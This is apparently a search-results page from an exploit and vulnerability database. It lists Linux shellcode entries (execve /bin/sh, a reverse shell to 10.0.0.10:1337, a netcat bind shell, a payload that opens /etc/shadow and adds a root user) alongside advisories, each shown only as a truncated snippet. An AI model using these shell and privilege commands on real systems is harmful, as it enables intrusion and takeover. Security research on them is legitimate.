Lucene search
+L

810 matches found

zdt
zdt
added 2016/02/26 12:00 a.m.29 views

Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)

/ Title : Linux/ARM - Connect back to ip:port with /bin/sh Length : 95 bytes Date : 2014-06-03 Author : Xeon Tested : ARM1176 rev6 v6l / include include char shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2016/02/26 12:00 a.m.29 views

Linux/ARM - Connect back to {ip:port} with /bin/sh - 95 bytes

Linux/ARM - Connect back to ip:port with /bin/sh - 95 bytes. Shellcode exploit for arm platform / Title : Linux/ARM - Connect back to ip:port with /bin/sh Length : 95 bytes Date : 2014-06-03 Author : Xeon Tested : ARM1176 rev6 v6l / include include char shellcode =...

0.2AI score
SaveExploits0
Exploit DB
Exploit DB
added 2016/01/04 12:00 a.m.96 views

Linux/x86 execve "/bin/sh" - shellcode 24 byte

Linux/x86 execve "/bin/sh" - shellcode 24 byte. Shellcode exploit for linx86 platform / ; Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte ; Platform: linux/x86 ; Date: 2015-01-03 ; Author: Dennis 'dhn' Herrmann ; Website: https://zer0-day.pw BITS 32 global start section .text ; syscalls...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2015/09/11 12:00 a.m.34 views

Linux x86_64 - /bin/sh

Linux x8664 - /bin/sh. Shellcode exploit for linx86-64 platform Exploit Title: Shellcode /bin/sh for Linux x8664 different approach Date: 2015-09-10 Exploit Author: Fanda Uchytil Version: 1 Tested on: Linux 3.16.0-4-amd64 Debian, 2.6.32-openvz-042stab093.5-amd64 Centos/RHEL based, 2.6.32-5-amd64...

0.2AI score
SaveExploits0
Exploit DB
Exploit DB
added 2015/06/15 12:00 a.m.26 views

Linux/x86 - execve /bin/sh shellcode 21 bytes 2

Linux/x86 - execve /bin/sh shellcode 21 bytes 2. Shellcode exploit for linx86 platform ​​Linux/x86 - Shutdowninit 0 - 30 bytes Greetz : BombermanLeader Author : B3mB4m 08048060 : 8048060: 31 c0 8048062: 50 8048063: 68 68 61 6c 74 push $0x746c6168 8048068: 68 69 6e 2f 2f push $0x2f2f6e69 804806d: ...

7.4AI score
SaveExploits0
zdt
zdt
added 2015/06/14 12:00 a.m.39 views

linux/x86 - execve /bin/sh shellcode - 21 bytes

Linux/x86 execve /bin/sh shellcode 21 bytes Greetz : KnocKout,curtis,BombermanLeader Author : B3mB4m Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2015/06/10 12:00 a.m.31 views

Linux/x86 - execve /bin/sh shellcode 21 bytes

Linux/x86 - execve /bin/sh shellcode 21 bytes. Shellcode exploit for linx86 platform Linux/x86 execve /bin/sh shellcode 21 bytes Greetz : KnocKout,curtis,BombermanLeader Author : B3mB4m Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 7...

7.4AI score
SaveExploits0
CNVD
CNVD
added 2015/05/26 12:00 a.m.5 views

Hikvision DS-7108HWI-SH XML External Entity Injection Vulnerability

Hikvision DS-7108HWI-SH is a digital video recorder product from Hikvision. An XML external entity injection vulnerability exists in the Hikvision DS-7108HWI-SH, which allows an attacker to exploit the vulnerability to obtain sensitive information or conduct denial-of-service attacks via special...

7.1AI score
SaveExploits0References1
zdt
zdt
added 2015/05/21 12:00 a.m.25 views

linux/x86 execve "/bin/sh" shellcode - 26 bytes

/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes ; Platform: linux/x8664 ; Date: 2015-05-19 ; Author: Reza Behzadpour ; Simple ShellCode section .text global start start: xor ecx,ecx mul ecx ;execve"/bin/sh", NULL, NULL mov al,11 jmp shell shellret: pop ebx push ecx push ebx pop ebx int...

0.2AI score
SaveExploits0
zdt
zdt
added 2015/05/16 12:00 a.m.29 views

linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode - 58 Bytes

/ Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode This shellcode will listen on port 17771 and give you /bin/sh Shellcode Author: Oleg Boytsev Tested on: Debian GNU/Linux 7/i686 Shellcode Length: 58 Command: gcc -m32 -z execstack x86Linuxnetcatshellcode.c -o x86Linuxnetcatshellcode global start...

7.1AI score
SaveExploits0
zdt
zdt
added 2015/05/16 12:00 a.m.36 views

Linux/x86 execve "/bin/sh" - shellcode - 35 bytes

/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes ; Platform: linux/x8664 ; Date: 2014-06-26 ; Author: Mohammad Reza Espargham ; Simple ShellCode section .text: 08048060 : 8048060: eb 17 jmp 8048079 08048062 : 8048062: 5e pop %esi 8048063: 31 d2 xor %edx,%edx 8048065: 52 push %edx 804806...

0.2AI score
SaveExploits0
zdt
zdt
added 2015/05/16 12:00 a.m.27 views

linux/x86 - Execve /bin/sh Shellcode Via Push - 21 bytes

/ Execve /bin/sh Shellcode Via Push Linux x86 21 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong email protected 18 February 2015 GPL .global start start: char const argv xorl %ecx, %ecx 2 bytes, and both %eax and %edx were zeroed mull %ecx NRexecve 11 movb $11, %al for '\x00' push...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2015/05/06 12:00 a.m.31 views

Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode 58 Bytes

Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode 58 Bytes. Shellcode exploit for linx86 platform / Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode This shellcode will listen on port 17771 and give you /bin/sh Shellcode Author: Oleg Boytsev Tested on: Debian GNU/Linux 7/i686 Shellcode Length:...

SaveExploits0
OSV
OSV
added 2015/05/01 12:00 a.m.32 views

DLA-217-1 xdg-utils - security update

Bulletin has no description...

8.8CVSS8.5AI score0.03256EPSS
SaveExploits1
Exploit DB
Exploit DB
added 2015/04/29 12:00 a.m.40 views

Linux x86 - Execve /bin/sh Shellcode Via Push 21 bytes

Linux x86 - Execve /bin/sh Shellcode Via Push 21 bytes. Shellcode exploit for linx86 platform / Execve /bin/sh Shellcode Via Push Linux x86 21 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong [email protected] 18 February 2015 GPL .global start start: char const argv xorl %ecx, %ecx...

0.5AI score
SaveExploits0
Debian
Debian
added 2015/02/22 5:00 a.m.82 views

[SECURITY] [DSA 3165-1] xdg-utils security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3165-1 [email protected] http://www.debian.org/security/ Michael Gilbert February 21, 2015 http://www.debian.org/security/faq -...

8.8CVSS8.7AI score0.03214EPSS
SaveExploits0
myhack58
myhack58
added 2015/02/12 12:00 a.m.43 views

BMW security vulnerability details: the ancient Bole to identify a good horse, today there are hackers escapement BMW-vulnerability warning-the black bar safety net

ADAC whole German automobile club want to in-depth understanding of embedded mobile network modem of the car to the manufacturer to send data. C't German computer technology magazine for the ADAC introduced a security expert. The expert in-depth analysis of the BMW ConnectedDrive system the data...

6.9AI score
SaveExploits0
zdt
zdt
added 2014/11/10 12:00 a.m.116 views

Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); - 87 Byte

87 bytes small position independent and alphanumeric 64-bit execve"/bin/sh\0",NULL,NULL; shellcode. Title: Position independent & Alphanumeric 64-bit execve"/bin/sh\0",NULL,NULL; 87 bytes Author: Breaking.Technology Date: 06 November 2014 Vendor Homepage: http://breaking.technology Version: x86-6...

7.1AI score
SaveExploits0
Metasploit
Metasploit
added 2014/09/24 12:00 a.m.163 views

Qmail SMTP Bash Environment Variable Injection (Shellshock)

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH Shellshock. This flaw works on the latest Qmail...

10CVSS8.6AI score0.99999EPSS
SaveExploits146
Exploit DB
Exploit DB
added 2014/09/09 12:00 a.m.27 views

Obfuscated Shellcode Linux x86 - chmod 777 /etc/passwd + /etc/shadow & Add New Root User & Execute /bin/bash

Obfuscated Shellcode Linux x86 - chmod 777 /etc/passwd + /etc/shadow & Add New Root User & Execute /bin/bash. Shellcode exploit for linux platform / Title: Obfuscated Shellcode Linux x86 chmod777 /etc/passwd and /etc/shadow && Add new root user ALI with password ALI for ssh && Setreuid , Execute...

0.1AI score
SaveExploits0
Rows per page
Query Builder